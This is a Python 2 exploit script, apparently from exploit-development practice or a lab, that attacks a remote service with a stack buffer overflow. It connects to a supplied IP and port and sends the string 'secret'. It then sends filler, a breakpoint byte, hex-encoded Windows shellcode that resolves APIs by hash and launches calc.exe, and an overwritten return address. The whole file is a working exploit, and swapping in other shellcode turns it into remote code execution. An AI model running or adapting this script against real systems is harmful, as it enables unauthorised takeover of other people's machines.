#!/usr/bin/python

import socket, sys, struct

shellcode = "\xe8\x00\x00\x00\x00\x5a\x8d\x52"\
"\xfb\x89\xe5\x81\xec\x00\x10\x00"\
"\x00\x52\xbb\x8e\xfe\x1f\x4b\xe8"\
"\x28\x00\x00\x00\x5a\x55\x52\x89"\
"\xc5\x8d\xb2\xe1\x00\x00\x00\x8d"\
"\xba\xe9\x00\x00\x00\xe8\x48\x00"\
"\x00\x00\x5a\x5d\x6a\x00\x8d\x82"\
"\xed\x00\x00\x00\x50\xff\x92\xe9"\
"\x00\x00\x00\xc3\xfc\x31\xff\x64"\
"\x8b\x3d\x30\x00\x00\x00\x8b\x7f"\
"\x0c\x8b\x7f\x14\x8b\x77\x28\x31"\
"\xd2\x66\xad\x84\xc0\x74\x11\x3c"\
"\x41\x72\x06\x3c\x5a\x77\x02\x0c"\
"\x20\xc1\xc2\x07\x30\xc2\xeb\xe9"\
"\x39\xda\x8b\x47\x10\x8b\x3f\x75"\
"\xdb\xc3\x89\xea\x03\x52\x3c\x8b"\
"\x52\x78\x01\xea\x8b\x5a\x20\x01"\
"\xeb\x31\xc9\x57\x56\x8b\x36\x31"\
"\xc9\x8b\x3b\x01\xef\x52\x31\xd2"\
"\xc1\xc2\x07\x32\x17\x47\x80\x3f"\
"\x00\x75\xf5\x92\x5a\x39\xf0\x74"\
"\x0c\x83\xc3\x04\x41\x39\x4a\x18"\
"\x75\xdf\x5e\x5f\xc3\x5e\x5f\xad"\
"\x56\x53\x89\xeb\x89\xde\x03\x5a"\
"\x24\x8d\x04\x4b\x0f\xb7\x00\x8d"\
"\x04\x86\x03\x42\x1c\x8b\x00\x01"\
"\xf0\xab\x5b\x5e\x83\xc3\x04\x41"\
"\x81\x3e\xff\xff\x00\x00\x75\xab"\
"\xc3\xad\x6d\xbf\xe8\xff\xff\x00"\
"\x00\x01\x00\x00\x00\x63\x61\x6c"\
"\x63\x2e\x65\x78\x65\x00"

if len(sys.argv) != 3:
	print "supply IP PORT"
	sys.exit(-1)

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect( (sys.argv[1], int(sys.argv[2])) )

###send
message = "secret\n\x00"
sock.sendall(message)

###recieve
data = sock.recv(10000)
print data

###send
breakpoint = "\xcc"
ret_addr_s=struct.pack('L', 0x7791e422)
pad = "B" * 400
nops_len = 1040 - len(shellcode) - len(pad) - len(breakpoint)
exploit = "A" * nops_len
exploit += breakpoint
exploit += shellcode
exploit += pad
exploit += ret_addr_s

sock.sendall(exploit)

###recieve
data = sock.recv(10000)
print data